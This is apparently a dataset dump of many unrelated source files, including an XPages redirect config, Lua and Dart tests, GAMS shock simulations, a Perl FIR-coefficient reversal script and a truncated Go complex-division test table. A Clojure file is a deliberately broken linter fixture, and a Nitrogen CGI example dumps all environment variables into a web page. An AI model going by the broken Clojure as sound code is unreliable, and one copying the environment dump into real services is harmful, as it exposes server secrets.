content
stringlengths
4
1.04M
lang
stringclasses
358 values
score
int64
0
5
repo_name
stringlengths
5
114
repo_path
stringlengths
4
229
repo_licenses
listlengths
1
8
<?xml version="1.0" encoding="UTF-8"?> <!-- ******************************************************************* --> <!-- --> <!-- © Copyright IBM Corp. 2012 --> <!-- --> <!-- Licensed under the Apache License, Version 2.0 (the "License"); --> <!-- you may not use this file except in compliance with the License. --> <!-- You may obtain a copy of the License at: --> <!-- --> <!-- http://www.apache.org/licenses/LICENSE-2.0 --> <!-- --> <!-- Unless required by applicable law or agreed to in writing, software --> <!-- distributed under the License is distributed on an "AS IS" BASIS, --> <!-- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or --> <!-- implied. See the License for the specific language governing --> <!-- permissions and limitations under the License. --> <!-- --> <!-- ******************************************************************* --> <faces-config> <faces-config-extension> <namespace-uri>http://www.ibm.com/xsp/coreex</namespace-uri> <default-prefix>xe</default-prefix> <designer-extension> <control-subpackage-name>misc</control-subpackage-name> </designer-extension> </faces-config-extension> <!-- Redirect Control --> <component> <description>A control that redirects to a different page when the browser or a request header matches one of the configured redirection rules</description> <display-name>Redirect</display-name> <component-type>com.ibm.xsp.extlib.misc.Redirect</component-type> <component-class>com.ibm.xsp.extlib.component.misc.UIRedirect</component-class> <property> <description>Redirection rules list. The order of the rules list is significant, as the first matching rule determines the redirect page.</description> <display-name>Redirection Rules</display-name> <property-name>rules</property-name> <property-class>java.util.List</property-class> <property-extension> <allow-run-time-binding>false</allow-run-time-binding> <collection-property>true</collection-property> <property-item-class>com.ibm.xsp.extlib.component.misc.AbstractRedirectRule</property-item-class> <property-add-method>addRule</property-add-method> <designer-extension> <category>basics</category> </designer-extension> </property-extension> </property> <component-extension> <base-component-type>javax.faces.Component</base-component-type> <component-family>com.ibm.xsp.extlib.misc.Redirect</component-family> <renderer-type>com.ibm.xsp.extlib.misc.Redirect</renderer-type> <tag-name>redirect</tag-name> <since>8.5.32003</since> <designer-extension> <in-palette>true</in-palette> <category>Extension Library</category> <tags> no-faces-config-renderer no-rendered-output </tags> </designer-extension> </component-extension> </component> <complex-type> <description>Abstract class that all redirect rules inherit from</description> <display-name></display-name> <complex-id>com.ibm.xsp.extlib.component.misc.AbstractRedirectRule</complex-id> <complex-class>com.ibm.xsp.extlib.component.misc.AbstractRedirectRule</complex-class> <complex-extension> <since>8.5.32003</since> </complex-extension> </complex-type> <complex-type> <description>Abstract class that inherits from AbstractRedirectRule and all redirect rules inherit from</description> <display-name></display-name> <complex-id>com.ibm.xsp.extlib.component.misc.RedirectRuleBase</complex-id> <complex-class>com.ibm.xsp.extlib.component.misc.RedirectRuleBase</complex-class> <property> <!-- # ".xsp" should not be translated --> <description>Redirection URL page to be opened, usually with the ".xsp" extension.</description> <display-name>Redirection URL</display-name> <property-name>url</property-name> <property-class>java.lang.String</property-class> <property-extension> <required>true</required> <designer-extension> <editor>com.ibm.workplace.designer.property.editors.PagePicker</editor> </designer-extension> </property-extension> </property> <property> <!-- # "#topic" and "#document" should not be translated --> <description>Redirection URL hash. Value specified here will be prefixed with "#" when added to the Redirection URL, like "#document" or "#topic".</description> <display-name>Redirection URL Hash</display-name> <property-name>urlHash</property-name> <property-class>java.lang.String</property-class> <property-extension> <designer-extension> <!-- tag not-xpage-name prevents a fail in PageEditorTest, as this property's value is not a path to an XPage, but is some anchor suffix appended to the XPage path. --> <tags> not-xpage-name </tags> </designer-extension> </property-extension> </property> <property> <description>By default the request parameters for the initially opened page are copied into the URL for the redirect target page. When this property is set, the request parameters are no longer automatically appending to the redirect URL. It is still possible to programmatically append the parameters, by computing the value of the Redirection URL property.</description> <display-name>Disable Request Parameters</display-name> <property-name>disableRequestParams</property-name> <property-class>boolean</property-class> <property-extension> <designer-extension> </designer-extension> </property-extension> </property> <property> <description>Extra parameters list to be appended to the Redirection URL.</description> <display-name>Extra Parameters</display-name> <property-name>extraParams</property-name> <property-class>java.util.List</property-class> <property-extension> <allow-run-time-binding>false</allow-run-time-binding> <collection-property>true</collection-property> <property-item-class>com.ibm.xsp.complex.Parameter</property-item-class> <property-add-method>addExtraParam</property-add-method> </property-extension> </property> <complex-extension> <base-complex-id>com.ibm.xsp.extlib.component.misc.AbstractRedirectRule</base-complex-id> <since>8.5.32003</since> </complex-extension> </complex-type> <!-- Redirect Phone rule --> <complex-type> <description>A rule used by the Redirect control to redirect to another page when the browser is on a mobile device</description> <display-name>Redirect Phone Rule</display-name> <complex-id>com.ibm.xsp.extlib.component.misc.RedirectPhoneRule</complex-id> <complex-class>com.ibm.xsp.extlib.component.misc.RedirectPhoneRule</complex-class> <complex-extension> <base-complex-id>com.ibm.xsp.extlib.component.misc.RedirectRuleBase</base-complex-id> <tag-name>redirectPhoneRule</tag-name> <since>8.5.32003</since> </complex-extension> </complex-type> <!-- Redirect Tablet rule --> <complex-type> <description>A rule used by the Redirect control to redirect to another page when the browser is on a tablet device</description> <display-name>Redirect Tablet Rule</display-name> <complex-id>com.ibm.xsp.extlib.component.misc.RedirectTabletRule</complex-id> <complex-class>com.ibm.xsp.extlib.component.misc.RedirectTabletRule</complex-class> <complex-extension> <base-complex-id>com.ibm.xsp.extlib.component.misc.RedirectRuleBase</base-complex-id> <tag-name>redirectTabletRule</tag-name> <since>8.5.32003</since> </complex-extension> </complex-type> <!-- Redirect Header rule --> <complex-type> <description>A rule used by the Redirect control to redirect to another page when a header matches a specified pattern</description> <display-name>Redirect Header Rule</display-name> <complex-id>com.ibm.xsp.extlib.component.misc.RedirectHeaderRule</complex-id> <complex-class>com.ibm.xsp.extlib.component.misc.RedirectHeaderRule</complex-class> <property> <!-- "custom" and "User-Agent" should not be translated. --> <description>Request header to be analyzed for matching against specified header pattern. This is only used when the rule type is "custom". The default header is "User-Agent".</description> <display-name>Request Header</display-name> <property-name>header</property-name> <property-class>java.lang.String</property-class> <property-extension> <designer-extension> <editor>com.ibm.workplace.designer.property.editors.comboParameterEditor</editor> <editor-parameter> User-Agent Accept </editor-parameter> </designer-extension> </property-extension> </property> <property> <description>Pattern of a request header as a regular expression</description> <display-name>Request Header Pattern</display-name> <property-name>headerPattern</property-name> <property-class>java.lang.String</property-class> <property-extension> <designer-extension> <editor>com.ibm.xsp.extlib.designer.tooling.editor.RegularExpressionEditor</editor> </designer-extension> </property-extension> </property> <complex-extension> <base-complex-id>com.ibm.xsp.extlib.component.misc.RedirectRuleBase</base-complex-id> <tag-name>redirectHeaderRule</tag-name> <since>8.5.32003</since> </complex-extension> </complex-type> <!-- Redirect Custom rule --> <complex-type> <description>A rule used by the Redirect control to redirect to another page when the redirect property evaluates to true</description> <display-name>Redirect Custom Rule</display-name> <complex-id>com.ibm.xsp.extlib.component.misc.RedirectCustomRule</complex-id> <complex-class>com.ibm.xsp.extlib.component.misc.RedirectCustomRule</complex-class> <property> <description>An property to allow you to decide when you want to redirect. Can be computed for any condition, will redirect if value is true. Default is false.</description> <display-name>Redirect</display-name> <property-name>redirect</property-name> <property-class>boolean</property-class> <property-extension> <designer-extension> </designer-extension> </property-extension> </property> <complex-extension> <base-complex-id>com.ibm.xsp.extlib.component.misc.RedirectRuleBase</base-complex-id> <tag-name>redirectCustomRule</tag-name> <since>8.5.32003</since> </complex-extension> </complex-type> </faces-config>
XPages
4
jesse-gallagher/XPagesExtensionLibrary
extlib/lwp/product/runtime/eclipse/plugins/com.ibm.xsp.extlib.controls/src/com/ibm/xsp/extlib/config/raw-extlib-redirect.xsp-config
[ "Apache-2.0" ]
- if @teams.empty? p No match found. - else .table-responsive table.table.table-striped.table-hover thead tr th th Team th Number of members th Number of namespaces tbody#teams - @teams.each do |team| tr td.table-icon= team_scope_icon(team) td= link_to team.name, team td= team.users.enabled.count td= team.namespaces.count
Slim
4
phulei/dockerlabs
play-with-docker/Portus/app/views/search/_teams.html.slim
[ "MIT" ]
RwPlatformNestedProjectLoadComponentV2 { #name : 'common/platforms/gemstone/Definitions', #condition : [ 'gemstone' ], #packageNames : [ 'Rowan-Cypress-Definitions', 'Rowan-Cypress-Kernel', 'Rowan-GemStone-Definitions' ], #conditionalPackageMapSpecs : { 'gemstone' : { 'allusers' : { #packageNameToPlatformPropertiesMap : { 'Rowan-Cypress-Definitions' : { 'symbolDictName' : 'RowanTools' }, 'Rowan-Cypress-Kernel' : { 'symbolDictName' : 'Globals' }, 'Rowan-GemStone-Definitions' : { 'symbolDictName' : 'RowanTools' } } } } }, #comment : 'Definitions gemstone packages ' }
STON
3
GemTalk/Rowan
rowan/components/common/platforms/gemstone/Definitions.ston
[ "MIT" ]
# humanstxt.org/ # The humans responsible & technology colophon # TEAM <name> -- <role> -- <twitter> # THANKS <name>
HTML+PHP
2
nakshatrasinghh/appwrite
app/views/general/humans.phtml
[ "BSD-3-Clause" ]
local helpers = require('test.functional.helpers')(after_each) local clear = helpers.clear local eq = helpers.eq local eval = helpers.eval local command = helpers.command local source = helpers.source describe('lispwords', function() before_each(clear) it('should be set global-local',function() source([[ setglobal lispwords=foo,bar,baz setlocal lispwords-=foo setlocal lispwords+=quux]]) eq('foo,bar,baz', eval('&g:lispwords')) eq('bar,baz,quux', eval('&l:lispwords')) eq('bar,baz,quux', eval('&lispwords')) command('setlocal lispwords<') eq('foo,bar,baz', eval('&g:lispwords')) eq('foo,bar,baz', eval('&l:lispwords')) eq('foo,bar,baz', eval('&lispwords')) end) end)
Lua
4
uga-rosa/neovim
test/functional/legacy/lispwords_spec.lua
[ "Vim" ]
(ns foo (:require [clojure.string :as str] ;; We're never using this namespace. Also, the namespaces aren't sorted. [clojure.set :as set])) ;; Here we made a typo, so the symbol is unresolved: (but-last [1 2 3]) ;; Clj-kondo knows about arities of clojure namespaces, but you can also teach ;; it about your libraries or own namespaces (str/join) ;; foo has an arity of 2, but we're not actually using y (defn foo-fn [x y] ;; this do is redundant: (do ;; this is handy for debugging, but please remove it before pushing your code: (def tmp_x x) (let [y (fn [] (inc x))] ;; the next let can be squashed together with the previous: (let [z y] ;; whoopsy, calling a local function with an incorrect number of args: (y x) ;; also wrong: (recur))))) (letfn [(f [] (h 1)) (h [] (f 1))]) (defn- private-fn []) ;; redefining it... (defn- private-fn []) (defn foo [] :foo) ;; Type error, because foo doesn't return a number! (inc (foo)) ;; I'm tired now, let's sleep... ;; Oops, not happening because of wrong amount of args: (Thread/sleep 1000 1 2) ;; Here we switch to another namespace and require the previous: (ns bar (:require [foo :as f])) ;; Wrong arity when calling a function from the previous namespace: (f/foo-fn) ;; private: (f/private-fn) ;; this won't pass the reader: {:a 1 :a 2} ;; and neither will this: #{1 1} ;; nor this: {:a 1 :b} (ns bar-test (:require [clojure.test :as t])) (t/deftest my-tests ;; you're not actually testing something here: (odd? (inc 1)))
Clojure
3
esabol/super-linter
.automation/test/clojure/clojure_bad_1.clj
[ "MIT" ]
%{ #include<stdio.h> int yyerror(char *s); int yylex(); int regs[26]; int base; %} %start digit %union { int a; } %token DIGIT LETTER %left '|' %left '&' %left '+' '-' %left '*' '/' '%' %left UMINUS /*supplies precedence for unary minus */ %% /* beginning of rules section */ digit: DIGIT; %% int main() { return(yyparse()); } int yyerror(s) char *s; { fprintf(stderr, "%s\n",s); return(0); } int yywrap() { return(1); }
Yacc
3
jcassagnol-public/scons
test/Decider/MD5-winonly-fixture/test_parse.y
[ "MIT" ]
// issue #36286 struct S<T: Clone> { a: T } struct NoClone; type A = S<NoClone>; fn main() { let s = A { a: NoClone }; //~^ ERROR the trait bound `NoClone: Clone` is not satisfied }
Rust
4
Eric-Arellano/rust
src/test/ui/structs/struct-path-alias-bounds.rs
[ "ECL-2.0", "Apache-2.0", "MIT-0", "MIT" ]
//This is the solution to http://codeforces.com/contest/897/problem/A //A. Scarborough Fair #raw "template.cpy" int main() int n, m string s cin >> n >> m >> s while m-- int l, r char c, cn cin >> l >> r >> c >> cn l--; r--; for i = l; i <= r; i++ if s[i] == c s[i] = cn cout << s
COBOL
4
saviour07/CPY
Examples/Contest problems/897A. Scarborough Fair/a.cpy
[ "MIT" ]
# ====================================================================================================================== # MPC and shocks # ====================================================================================================================== $IMPORT partiel_hh_model.gms $SETLOCAL shock_year 2026; OPTION SOLVELINK=0, NLP=CONOPT4; set_time_periods(%shock_year%-1, %terminal_year%) @save(All); # ---------------------------------------------------------------------------------------------------------------------- # MPC-model - partiel model med endogene skatter og endogent referenceforbrug # ---------------------------------------------------------------------------------------------------------------------- $MODEL M_MPC M_partiel # M_incl_tax -E_vHhInd # B_ref_eksogen # -B_ref_endogen ; $GROUP G_mpc G_Partiel # G_incl_taxes -vHhInd$(a[a_]) ; # Midlertidigt stød @reset(All); vHhInd.l[a,t]$(a.val >= 18 and t.val = %shock_year%) = vHhInd.l[a,t] + 0.001; vHhInd.l[a,t]$(a.val >= 18 and t.val = %shock_year%+1) = vHhInd.l[a,t] + 0.0005; $FIX ALL; $UNFIX G_mpc$(tx0[t]); @solve(M_MPC); $FIX All; $UNFIX G_post_partiel$(tx0[t]); @solve(B_post_partiel); @unload(Gdx\mpc); # Permanent stød @reset(All); vHhInd.l[a,t]$(a.val >= 18) = vHhInd.l[a,t] + 0.001; $FIX ALL; $UNFIX G_mpc$(tx0[t]); @solve(M_MPC); $FIX All; $UNFIX G_post_partiel$(tx0[t]); @solve(B_post_partiel); @unload(Gdx\mpc_permanent); # ---------------------------------------------------------------------------------------------------------------------- # MPC-model men med eksogent referenceforbrug # ---------------------------------------------------------------------------------------------------------------------- $MODEL M_MPC_ref_ekso M_MPC, -B_ref_endogen, B_ref_eksogen ; # Midlertidigt stød @reset(All); vHhInd.l[a,t]$(a.val >= 18 and t.val = %shock_year%) = vHhInd.l[a,t]*(1+0.001); vHhInd.l[a,t]$(a.val >= 18 and t.val = %shock_year%+1) = vHhInd.l[a,t]*(1+0.0005); $FIX ALL; $UNFIX G_mpc$(tx0[t]); @solve(M_MPC_ref_ekso); @unload(Gdx\mpc_ref_ekso); # Permanent stød @reset(All); vHhInd.l[a,t]$(a.val >= 18) = vHhInd.l[a,t]*(1+0.001); $FIX ALL; $UNFIX G_mpc$(tx0[t]); @solve(M_MPC_ref_ekso); $FIX All; $UNFIX G_post_partiel$(tx0[t]); @solve(B_post_partiel); @unload(Gdx\mpc_permanent_ref_ekso); # ---------------------------------------------------------------------------------------------------------------------- # MPC-model men med eksogen boligmængde i første periode # ---------------------------------------------------------------------------------------------------------------------- $GROUP G_mpc_eksogen_bolig G_mpc -qBoligR$(a[a_] and t1[t]), uBolig$(t1[t]) -qBoligHtM$(a[a_] and t1[t]), uBoligHtM$(t1[t]) ; # Midlertidigt stød @reset(All); vHhInd.l[a,t]$(a.val >= 18 and t.val = %shock_year%) = vHhInd.l[a,t]*(1+0.001); vHhInd.l[a,t]$(a.val >= 18 and t.val = %shock_year%+1) = vHhInd.l[a,t]*(1+0.0005); $FIX ALL; $UNFIX G_mpc_eksogen_bolig$(tx0[t]); @solve(M_MPC); $FIX All; $UNFIX G_post_partiel$(tx0[t]); @solve(B_post_partiel); @unload(Gdx\mpc_eksogen_bolig); # Permanent stød @reset(All); vHhInd.l[a,t]$(a.val >= 18) = vHhInd.l[a,t]*(1+0.001); $FIX ALL; $UNFIX G_mpc_eksogen_bolig$(tx0[t]); @solve(M_MPC); $FIX All; $UNFIX G_post_partiel$(tx0[t]); @solve(B_post_partiel); @unload(Gdx\mpc_permanent_eksogen_bolig); # Negativt midlertidigt stød @reset(All); vHhInd.l[a,t]$(a.val >= 18 and t.val = %shock_year%) = vHhInd.l[a,t]- 0.001; vHhInd.l[a,t]$(a.val >= 18 and t.val = %shock_year%+1) = vHhInd.l[a,t]- 0.0005; $FIX ALL; $UNFIX G_mpc$(tx0[t]); @solve(M_MPC); $FIX All; $UNFIX G_post_partiel$(tx0[t]); @solve(B_post_partiel); @unload(Gdx\mpc_ned_eksogen_bolig); # Boligpris-stød @reset(All); pBolig.l[t] = pBolig.l[t] * 1.01; $FIX ALL; $UNFIX G_mpc$(tx0[t]); @solve(M_MPC); $FIX All; $UNFIX G_post_partiel$(tx0[t]); @solve(B_post_partiel); @unload(Gdx\mpc_pBolig_eksogen_bolig); @reset(All); pBolig.l[t] = pBolig.l[t] / 1.01; $FIX ALL; $UNFIX G_mpc$(tx0[t]); @solve(M_MPC); $FIX All; $UNFIX G_post_partiel$(tx0[t]); @solve(B_post_partiel); @unload(Gdx\mpc_pBolig_ned_eksogen_bolig); # ====================================================================================================================== # Indkomst-stød på fuld model # ====================================================================================================================== jvHhNFErest.l[a,t]$(a.val >= 18) = jvHhNFErest.l[a,t] + 0.001; $FIX All; $UNFIX G_endo; @solve(M_base); $FIX All; $UNFIX G_post_endo; @solve(B_post); @unload(Gdx\MPC_full_permanent); @reset(All); jvHhNFErest.l[a,t]$(a.val >= 18 and t.val = %shock_year%) = jvHhNFErest.l[a,t] + 0.001; jvHhNFErest.l[a,t]$(a.val >= 18 and t.val = %shock_year%+1) = jvHhNFErest.l[a,t] + 0.0005; $FIX All; $UNFIX G_endo; @solve(M_base); $FIX All; $UNFIX G_post_endo; @solve(B_post); @unload(Gdx\MPC_full);
GAMS
3
gemal/MAKRO
Analysis/Shocks_MPC/pShocks_MPC.gms
[ "MIT" ]
.class public Ldo/if/A; .super Ljava/lang/Object;
Smali
0
DSYliangweihao/jadx
jadx-core/src/test/smali/names/TestReservedPackageNames/a.smali
[ "Apache-2.0" ]
/** * This file is part of the Phalcon Framework. * * (c) Phalcon Team <team@phalcon.io> * * For the full copyright and license information, please view the LICENSE.txt * file that was distributed with this source code. */ namespace Phalcon\Storage\Adapter; use Phalcon\Storage\Serializer\SerializerInterface; /** * Interface for Phalcon\Logger adapters */ interface AdapterInterface { /** * Flushes/clears the cache */ public function clear() -> bool; /** * Decrements a stored number */ public function decrement(string! key, int value = 1) -> int | bool; /** * Deletes data from the adapter */ public function delete(string! key) -> bool; /** * Reads data from the adapter * * @param string key * @param mixed|null defaultValue * * @return mixed */ public function get(string! key, var defaultValue = null) -> var; /** * Returns the already connected adapter or connects to the backend * server(s) */ public function getAdapter() -> var; /** * Returns all the keys stored */ public function getKeys(string! prefix = "") -> array; /** * Returns the prefix for the keys */ public function getPrefix() -> string; /** * Checks if an element exists in the cache */ public function has(string! key) -> bool; /** * Increments a stored number */ public function increment(string! key, int value = 1) -> int | bool; /** * Stores data in the adapter * * @param string key * @param mixed value * @param \DateInterval|int|null ttl */ public function set(string! key, var value, var ttl = null) -> bool; }
Zephir
5
stijn1989/cphalcon
phalcon/Storage/Adapter/AdapterInterface.zep
[ "BSD-3-Clause" ]
# Copyright 2021 The Google Research Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. #!/bin/bash # # An example script for launching 5 RL seeds across 2 GPUs. set -e while getopts e:i: flag do case "${flag}" in e) embodiment=${OPTARG};; i) iters=${OPTARG};; esac done ENV_NAME="SweepToTop-"${embodiment^}"-State-Allo-TestLayout-v0" NAME="env_reward_$embodiment" for seed in {0..2} do python train_policy.py \ --experiment_name $NAME \ --env_name $ENV_NAME \ --seed=$seed \ --device="cuda:0" \ --config.num_train_steps=$iters \ & done for seed in {3..4} do python train_policy.py \ --experiment_name $NAME \ --env_name $ENV_NAME \ --seed=$seed \ --device="cuda:1" \ --config.num_train_steps=$iters \ & done
Shell
3
xxdreck/google-research
xirl/scripts/launch_rl_multi_gpu.sh
[ "Apache-2.0" ]
<div class="middle aligned column"> <div class="ui right floated buttons"> {% if definition.actionGroups.main is defined %} {% for action in definition.getEnabledActions('main') %} {{ sylius_grid_render_action(resources, action, null) }} {% endfor %} {% endif %} </div> </div>
Twig
3
titomtd/Sylius
src/Sylius/Bundle/AdminBundle/Resources/views/Crud/Index/_actions.html.twig
[ "MIT" ]
#!/usr/local/bin/nitrogen import 'std/string' import 'std/collections' import 'std/os' const printMap = fn(map) { const list = collections.reduce(map, fn(acc, val, key) { acc + string.format('<li>{}: {}</li>', key, val) }, '<ul>') return list + '</ul>' } println(string.format('Content-Type: text/html <!DOCTYPE html> <html> <head> <title>Nitrogen Webpage CGI Example</title> </head> <body> <h2>Hello from Nitrogen! CGI</h2> <h3>Script Environment:</h3> {} {} </body> </html> ', printMap(os.env()), printMap(_SERVER)))
Inform 7
4
lfkeitel/nitrogen
examples/webserver-cgi/app/index.ni
[ "BSD-3-Clause" ]
.p-10 { padding: 10 20 10 20; } .m-b-10 { margin-bottom: 10; } .page { background-color: #F2F2F2; } ListView { background-color: yellow; } TextView { background-color: #FFF; } .bordered { border-width: 5; border-color: green; } .fixed-height { height: 55; } .border-radius { border-radius: 15; } .border-radius-nonuniform { border-radius: 10 20 30 40; } .bordered-nonuniform { border-top-color: red; border-right-color: green; border-bottom-color: blue; border-left-color: purple; border-top-width: 5; border-right-width: 10; border-bottom-width: 15; border-left-width: 20; } .body { font-size: 11; }
CSS
2
tralves/NativeScript
apps/ui/src/list-view/row-height.css
[ "Apache-2.0" ]
# Have this module language version differ from calling package one. use v6.c; unit module ClientLang; use nqp; sub client-ctx( --> Mu ) is raw is export { nqp::p6clientctx() } sub client-core-ctx( --> Mu ) is raw is export { nqp::p6clientcorectx() } sub client-core-rev( --> Str ) is export { nqp::p6clientcorerev() } sub client-core-ver( --> Str ) is export { nqp::p6clientcorever() } # The following subs are wrappers to check for CLIENT::-like behaviour of the ops sub client-rev( --> Str ) is export { client-core-rev } sub client-ver( --> Str ) is export { client-core-ver }
Perl6
4
raydiak/rakudo
t/packages/02-rakudo/lib/ClientLang.pm6
[ "Artistic-2.0" ]
name: machine-code-hoare-logic-unint version: 1.0 description: Machine code Hoare logic state (before re-interpretation) author: HOL OpenTheory Packager <opentheory-packager@hol-theorem-prover.org> license: MIT main { import: state import: temporal-state } state { article: "state.ot.art" } temporal-state { import: state article: "temporal_state.ot.art" }
Isabelle
3
dwRchyngqxs/HOL
examples/l3-machine-code/common/machine-code-hoare-logic-state-unint.thy
[ "BSD-3-Clause" ]
use Getopt::Std ; use Datascope ; sub die_n_weep { die ( "Usage: $0 [-nv] [-p pffile] stage_dir\n" ); } #die if ( ! getopts('nvp:') || @ARGV != 1 ) { &die_n_weep(); } # main $stagedir = shift; $opt_v = 1 if ($opt_n); &die_n_weep() if ( ! -d "$stagedir" ); $pf=($opt_p) ? $opt_p : "reverse_fir"; $listref= pfget($pf,"filters"); @list = @$listref; print "no. of filters: " . @list . "\n" if ($opt_v); foreach $filter_name (@list) { if ($filter_name !~ /.*M$/ ) { print " The filter $filter_name did not end with M. Is it really minimum phase / asymmetrical?\n"; } open (FLT, "<$stagedir/$filter_name") or die "Could not open <$stagedir/$filter_name for reading - $!\n"; @filter = <FLT>; # read in the filter close FLT; if ($filter[0] =~ /reversed/ ) { # check if already reversed die "Is the filter $filter_name already reversed?\nIf not get rid of the \"reversed\" in its first line and rerun.\n"; } if ($opt_v) { # print out some info for the curious print "reversing coefficients for filter $filter_name\n"; } undef @filter_out ; # leave a remark about reversing the Quanterra FIR filter file, that can be checked for ($filter_out[0] = $filter[0]) =~ s/\# (.*) Quanterra/\# reversed $1 Quanterra/; $nlin = 1; $ncoef = 1; while ( ($filter[$nlin] =~ /^\#|^\s*\n/) || # header with comments or empty lines ($filter[$nlin] !~ /^\#/ && $#fir_check != 4) ) { # needs to have exactly 5 fields, see response(5) # ($filter[$nlin] !~ /theoretical|measured/) { # could just not match /theoretical|measured/ $filter_out[$nlin] = $filter[$nlin]; $nlin++; @fir_check = split ( '\s+', $filter[$nlin] ); # num. coef && check if really a fir filter } if ($fir_check[3] !~ /fir/ ) { die "Is the filter $filter_name really a FIR filter?\nIts response type is not \"fir\".\n"; } $info = $nlin +3; # messy! while ( $nlin < $info) { # theoretical, sampling decimal factor, num. of coef. $filter_out[$nlin] = $filter[$nlin]; $nlin++; } while ($nlin <= ($#filter-1)){ # body, ie, filter coef, just nominators! $filter_out[$nlin] = $filter[$#filter-$ncoef]; # invert it $ncoef++; $nlin++; } $filter_out[$nlin] = $filter[$#filter]; # last line, number of denominator coeff., ie, 0 if ($opt_n) { $fh = STDOUT; } else { print "copying $stagedir/$filter_name to $stagedir/$filter_name.old\n" if ($opt_v); $cmd = "cp $stagedir/$filter_name $stagedir/$filter_name.old"; # make backup copies system( $cmd ); $fh = NEWFLT; open ($fh, ">$stagedir/$filter_name") or die "Could not open <$stagedir/$filter_name for writing - $!\n"; } for ($i=0 ; $i <= $#filter ; $i++) { print $fh $filter_out[$i]; } close $fh unless ($opt_n) ; }
XProc
4
jreyes1108/antelope_contrib
bin/db/reverse_fir/reverse_fir.xpl
[ "BSD-2-Clause", "MIT" ]
{{#isQueryParam}}{{{dataType}}} {{paramName}}{{/isQueryParam}}
HTML+Django
1
MalcolmScoffable/openapi-generator
modules/openapi-generator/src/main/resources/java-undertow-server/queryParams.mustache
[ "Apache-2.0" ]
#!/usr/bin/env python # This file is Python 2 compliant. import sys if sys.version_info[0] == 3: #from .extractor import Extractor, VideoExtractor #from .util import log from .__main__ import * #from .common import * #from .version import * #from .cli_wrapper import * #from .extractor import * else: # Don't import anything. pass
Python
3
adger-me/you-get
src/you_get/__init__.py
[ "MIT" ]
// Copyright 2014 The Flutter Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. import 'package:flutter_test/flutter_test.dart'; void main() { test('Dart defines can be provided', () { expect(const String.fromEnvironment('flutter.test.foo'), 'bar'); }); }
Dart
4
Mayb3Nots/flutter
dev/automated_tests/flutter_test/dart_defines_test.dart
[ "BSD-3-Clause" ]
// skip // # generated by cmplxdivide.c package main import "math" var ( nan = math.NaN() inf = math.Inf(1) zero = 0.0 ) var tests = []struct { f, g complex128 out complex128 }{ {complex(zero, zero), complex(zero, zero), complex(nan, nan)}, {complex(zero, zero), complex(zero, -zero), complex(nan, nan)}, {complex(zero, zero), complex(zero, 1), complex(zero, zero)}, {complex(zero, zero), complex(zero, -1), complex(-zero, zero)}, {complex(zero, zero), complex(zero, 2), complex(zero, zero)}, {complex(zero, zero), complex(nan, nan), complex(nan, nan)}, {complex(zero, zero), complex(nan, inf), complex(zero, -zero)}, {complex(zero, zero), complex(nan, -inf), complex(-zero, zero)}, {complex(zero, zero), complex(zero, zero), complex(nan, nan)}, {complex(zero, zero), complex(-zero, -zero), complex(nan, nan)}, {complex(zero, zero), complex(zero, 1), complex(zero, zero)}, {complex(zero, zero), complex(-zero, -1), complex(-zero, -zero)}, {complex(zero, zero), complex(zero, 2), complex(zero, zero)}, {complex(zero, zero), complex(nan, nan), complex(nan, nan)}, {complex(zero, zero), complex(nan, inf), complex(zero, -zero)}, {complex(zero, zero), complex(nan, -inf), complex(-zero, zero)}, {complex(zero, zero), complex(1, zero), complex(zero, zero)}, {complex(zero, zero), complex(1, -zero), complex(zero, zero)}, {complex(zero, zero), complex(1, 1), complex(zero, zero)}, {complex(zero, zero), complex(1, -1), complex(zero, zero)}, {complex(zero, zero), complex(1, 2), complex(zero, zero)}, {complex(zero, zero), complex(nan, nan), complex(nan, nan)}, {complex(zero, zero), complex(nan, inf), complex(zero, -zero)}, {complex(zero, zero), complex(nan, -inf), complex(-zero, zero)}, {complex(zero, zero), complex(-1, zero), complex(-zero, -zero)}, {complex(zero, zero), complex(-1, -zero), complex(-zero, -zero)}, {complex(zero, zero), complex(-1, 1), complex(-zero, -zero)}, {complex(zero, zero), complex(-1, -1), complex(-zero, -zero)}, {complex(zero, zero), complex(-1, 2), complex(zero, -zero)}, {complex(zero, zero), complex(nan, nan), complex(nan, nan)}, {complex(zero, zero), complex(nan, inf), complex(zero, -zero)}, {complex(zero, zero), complex(nan, -inf), complex(-zero, zero)}, {complex(zero, zero), complex(2, zero), complex(zero, zero)}, {complex(zero, zero), complex(2, -zero), complex(zero, zero)}, {complex(zero, zero), complex(2, 1), complex(zero, zero)}, {complex(zero, zero), complex(2, -1), complex(zero, zero)}, {complex(zero, zero), complex(2, 2), complex(zero, zero)}, {complex(zero, zero), complex(nan, nan), complex(nan, nan)}, {complex(zero, zero), complex(nan, inf), complex(zero, -zero)}, {complex(zero, zero), complex(nan, -inf), complex(-zero, zero)}, {complex(zero, zero), complex(nan, zero), complex(nan, nan)}, {complex(zero, zero), complex(nan, -zero), complex(nan, nan)}, {complex(zero, zero), complex(nan, 1), complex(nan, nan)}, {complex(zero, zero), complex(nan, -1), complex(nan, nan)}, {complex(zero, zero), complex(nan, 2), complex(nan, nan)}, {complex(zero, zero), complex(nan, nan), complex(nan, nan)}, {complex(zero, zero), complex(nan, inf), complex(zero, -zero)}, {complex(zero, zero), complex(nan, -inf), complex(-zero, zero)}, {complex(zero, zero), complex(inf, zero), complex(zero, zero)}, {complex(zero, zero), complex(inf, -zero), complex(zero, zero)}, {complex(zero, zero), complex(inf, 1), complex(zero, zero)}, {complex(zero, zero), complex(inf, -1), complex(zero, zero)}, {complex(zero, zero), complex(inf, 2), complex(zero, zero)}, {complex(zero, zero), complex(nan, nan), complex(nan, nan)}, {complex(zero, zero), complex(nan, inf), complex(zero, -zero)}, {complex(zero, zero), complex(nan, -inf), complex(-zero, zero)}, {complex(zero, zero), complex(-inf, zero), complex(-zero, -zero)}, {complex(zero, zero), complex(-inf, -zero), complex(-zero, -zero)}, {complex(zero, zero), complex(-inf, 1), complex(-zero, -zero)}, {complex(zero, zero), complex(-inf, -1), complex(-zero, -zero)}, {complex(zero, zero), complex(-inf, 2), complex(-zero, -zero)}, {complex(zero, zero), complex(nan, nan), complex(nan, nan)}, {complex(zero, zero), complex(nan, inf), complex(zero, -zero)}, 